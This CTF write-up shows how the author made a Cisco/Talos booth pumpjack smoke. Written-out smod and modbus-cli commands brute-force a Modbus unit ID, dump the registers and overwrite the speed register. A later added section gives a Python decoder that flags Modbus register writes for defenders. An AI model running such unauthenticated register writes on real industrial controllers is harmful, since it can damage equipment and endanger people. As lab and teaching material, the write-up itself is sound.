
JP Dias

Posted on • Originally published at jpdias.me on

Make it smoke! Cisco Challenge Write-up

BSides is the biggest security event in Portugal, with 2 days of talks, workshops, a CTF competition, and lots more. During BSides some side quests, ranging from raffles to challenges, appear that can win you prizes! This is a write-up of one of those challenges, by Cisco/Talos.

The Challenge

Make it Smoke!

At the Cisco/Talos booth we were presented with the following scenario (as can be seen in the picture):

  1. An access point (AP) named security with the password cisco12345.
  2. A 3D-printed pumpjack [1].
  3. Some kind of Arduino-based controller.
  4. The objective was to make it smoke somehow.

Preliminaries

First things first: connect to the network and do a quick network and port scan. Since the AP was shared by everyone who wanted to do the challenge, several IPs showed up, but only one was interesting: 10.10.10.1, with port 502 open.

As per the Siemens documentation: "By default, the protocol uses Port 502 as local port in the Modbus server" [2]. Thus we were probably faced with something that speaks the Modbus protocol.

With a little searching you can find a lot of Modbus protocol clients in the wild, as well as some offensive toolkits.

Making it smoke!

Using the smod-1 toolkit by theralfbrown I was able to connect to the Modbus system and interact with it.

$ python smod.py
SMOD > use modbus/scanner/uid
SMOD modbus(uid) > set RHOST 10.10.10.1
SMOD modbus(uid) > exploit
[+] Module Brute Force UID Start
[+] Start Brute Force UID on : 10.10.10.1
[+] UID on 10.10.10.1 is : 10

Now I knew the UID of the Modbus device; however, even after exploring the DoS capabilities and all the reader modules, I was not getting anywhere close to making it smoke.

So, after exploring a little more on GitHub, I found this really nice modbus-cli by tallakt.

Even though it was not written with an offensive mindset like the previous tool, it allowed us to read, write and dump the memory of a Modbus device. Using it we were able to read arbitrary parts of the memory, for example reading five words from the device starting at address %MW100 (which corresponds to address 400101).

$ modbus read 10.10.10.1 %MW100 5
%MW100 0
%MW101 0
%MW102 0
%MW103 0
%MW104 0

After trying to read random places in memory with this tool and finding nothing but zero values, I decided to just dump everything into a file (the operation took around 20 seconds).

$ modbus read --output mybackup.yml 10.10.10.1 400001 1000

After dumping all the memory into a file, I looked into it:

$ cat mybackup.yml 
---
:host: 10.10.10.1
:port: 502
:slave: 1
:offset: '400001'
:data:
- 0
- 0
- 0
- 0
- 0
- 0
- 5000
- 0
-- show more --

The file keeps going on, with a lot of zeros and a lot of random values. I guess those random values were the result of all the participants trying to pwn it.

However, that seventh value caught my attention because it was a plain round number. Maybe that was the speed of the rotation mechanism of the pumpjack. Maybe.

To check that the dump was correct, we read that specific part of the memory again with the same tool:

$ modbus read 10.10.10.1 400001 7
400001 0
400002 0
400003 0
400004 0
400005 0
400006 0
400007 8000

And yep, the value was still there, but a bit higher (and we could see the pumpjack rotating more quickly).

So the next step was to try writing a higher value there:

$ modbus write 10.10.10.1 400007 10000

And then, higher:

$ modbus write 10.10.10.1 400007 18000

And that was it: the increase in the rotation speed of the pumpjack triggered the smoke device connected to the Arduino!
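The whole attack above is just unauthenticated Modbus/TCP reads and writes to holding registers, which is exactly what a defender should be watching for on port 502. The following decoder is an added example (not from the write-up, smod or modbus-cli): it parses the MBAP header and the Read Holding Registers / Write Single Register / Write Multiple Registers PDUs, maps zero-based register offsets to the 4xxxxx references modbus-cli prints (offset 6 is 400007, %MW100 is 400101), and flags any write touching a watched register. The sample frames and the watched-register set are constructed for the demonstration.

```python
import struct

FC_READ_HOLDING = 0x03    # Read Holding Registers
FC_WRITE_SINGLE = 0x06    # Write Single Register
FC_WRITE_MULTIPLE = 0x10  # Write Multiple Registers


def holding_address(offset):
    """Zero-based PDU offset -> 4xxxxx reference (offset 6 -> 400007, 100 -> 400101)."""
    return 400001 + offset


def parse_mbap_frame(frame):
    """Decode one Modbus/TCP request frame: 7-byte MBAP header followed by the PDU."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header")
    tid, pid, length, uid = struct.unpack(">HHHB", frame[:7])
    if pid != 0:
        raise ValueError("protocol id %d is not Modbus" % pid)
    if length != len(frame) - 6:        # length counts unit id + PDU
        raise ValueError("MBAP length mismatch")
    fc, data = frame[7], frame[8:]
    rec = {"tid": tid, "uid": uid, "fc": fc, "op": "other"}
    if fc == FC_READ_HOLDING:
        start, count = struct.unpack(">HH", data[:4])
        rec.update(op="read", start=holding_address(start), count=count)
    elif fc == FC_WRITE_SINGLE:
        addr, value = struct.unpack(">HH", data[:4])
        rec.update(op="write", start=holding_address(addr), values=[value])
    elif fc == FC_WRITE_MULTIPLE:
        start, count, nbytes = struct.unpack(">HHB", data[:5])
        if nbytes != 2 * count or len(data) < 5 + nbytes:
            raise ValueError("byte count does not match register count")
        values = list(struct.unpack(">%dH" % count, data[5:5 + nbytes]))
        rec.update(op="write", start=holding_address(start), values=values)
    return rec


def flag_writes(frames, watched):
    """Return (unit id, hit registers, values) for every write that touches a watched register."""
    alerts = []
    for frame in frames:
        rec = parse_mbap_frame(frame)
        if rec["op"] != "write":
            continue
        touched = range(rec["start"], rec["start"] + len(rec["values"]))
        hits = [a for a in touched if a in watched]
        if hits:
            alerts.append((rec["uid"], hits, rec["values"]))
    return alerts


# Constructed sample traffic: read 400001..400007, write 400007=18000, write 400006..400007=[0,10000]
SAMPLE_FRAMES = [
    bytes.fromhex("0001 0000 0006 01 03 0000 0007"),
    bytes.fromhex("0002 0000 0006 01 06 0006 4650"),
    bytes.fromhex("0003 0000 000b 01 10 0005 0002 04 0000 2710"),
]
WATCHED_REGISTERS = {400007}  # the pumpjack speed register from this write-up
```

Running `flag_writes(SAMPLE_FRAMES, WATCHED_REGISTERS)` on a capture from the booth network would have reported both writes to 400007, unit 1, with the values 18000 and [0, 10000]; the read request produces no alert.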

Running like hell!

It was a fun challenge by Cisco and Talos. And pwning IoT devices is the real sh*t.

[1] Pumpjack on Wikipedia

[2] Which ports are released for Modbus/TCP communication (Siemens documentation)
